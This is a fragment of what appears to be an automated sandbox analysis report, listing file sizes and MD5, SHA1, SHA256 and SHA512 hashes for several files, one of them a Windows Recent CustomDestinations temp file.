SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
3KB
MD52cf72d7b402be9b7c6390b774f611259
SHA1fd8943d464d6ae7d0508e5869c1244fa43a4f3a9
SHA256345b91c5f950e5c1eec5ea1735e5722ec9c32de3fecde00e76c6e4830a58be43
SHA51242a054f09b2f59618ffb6beb6a808b3a51cf8796b56d28a75813c02c6253a5c8ff0bcfeb730e2bdf4793f7462622787b27782077ebf7557d07aee89490c34049
-
Filesize
4KB
MD53e69c6aa3db22c1db4b514b81496474f
SHA15e4c7a99602e76ab33aed93ebebdda32d8431628
SHA256e748db8fb82a12106de8baaf2d525a5ccd56de4c6354b02aad0abde5ef5dcb67
SHA51208d381918e3f209142dc7e1b05e9500d25833a84fb555fb5034237c0279d60c921a9fe88a8865061e6f8c1e33e5c0ef787ee6631b53b22fb17c6d99f8f109915
-
Filesize
1KB
MD5a9e4c335c9d878edd6db11161213b490
SHA1807fca2338d7e5d2a4690bd31ea8cc94452aae50
SHA256d33c775e398bed49421fba4f3c4eaab1116dc1657045c82a48a2c787f7789a04
SHA512b46fefd1d21e9ddb1a4e3e314f9d2e8c8634bfaf5b41ea876fc37cdb71f71f3a84a0c4cd4c7a2e71393ab2ea41621c563890e5e06e12f432dd80777e6158b86a
-
Filesize
1KB
MD593bb5ef9b24762f5b777902db9652a90
SHA14d5b4963a4cc2a0c739b421d172642328e89faec
SHA25688c5c0ecab55fcfe0f7585ad40a094bc44c4db8828eb1427d5d4f8a528521dfa
SHA512ebfe105c6f4c936af682d0f94a7821ac94afa83f1a489310393939d90fbdfdb65b6dc7f558fbce7c3bc08be9d1d8730d2d66ee1261ea00ff9c8db4d348c22837
-
Filesize
3KB
MD528661f406d4619247e300df74949b3d9
SHA1487b9828c921181bf6156bc457060f70d141c1da
SHA2560d7f5495f44a7667922b979efbaf163d9b8787be057fb996b528d919306317e6
SHA51297d5f511dea6c39c076adc6dabf947fd5d68ec3db81b4da173f0952c5800291431742b3ae868fa74d73a8f877e316efb091b76e86b168aa0b3541ae3bd27e4dd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MAN20DV3AE7N9FNLNFE9.temp
Filesize7KB
MD539412b0c7dd5f1e13aa8338ab53b677b
SHA13480d86e8a07ac41f0c449d9b520d949e57b38eb
SHA256c9b8606ee62a0bb0ac78fc144ea08b6b9f1179c0f9ed30b475bc9be9fe60c987
SHA51249af75c81c43d743bd34f111b88d53d282e659c28267226a35b8a7ef8a86c15e94bf1affebf0763a653838ad9826db8e678cabb242d9a1ef2bb57bc23236c6ec
-
Filesize
494KB
MD5be60fe46432e08e827aeefd9f72d5790
SHA17322ebc77810e84976136174258dddde78a23f27
SHA2568722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4
SHA51272a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913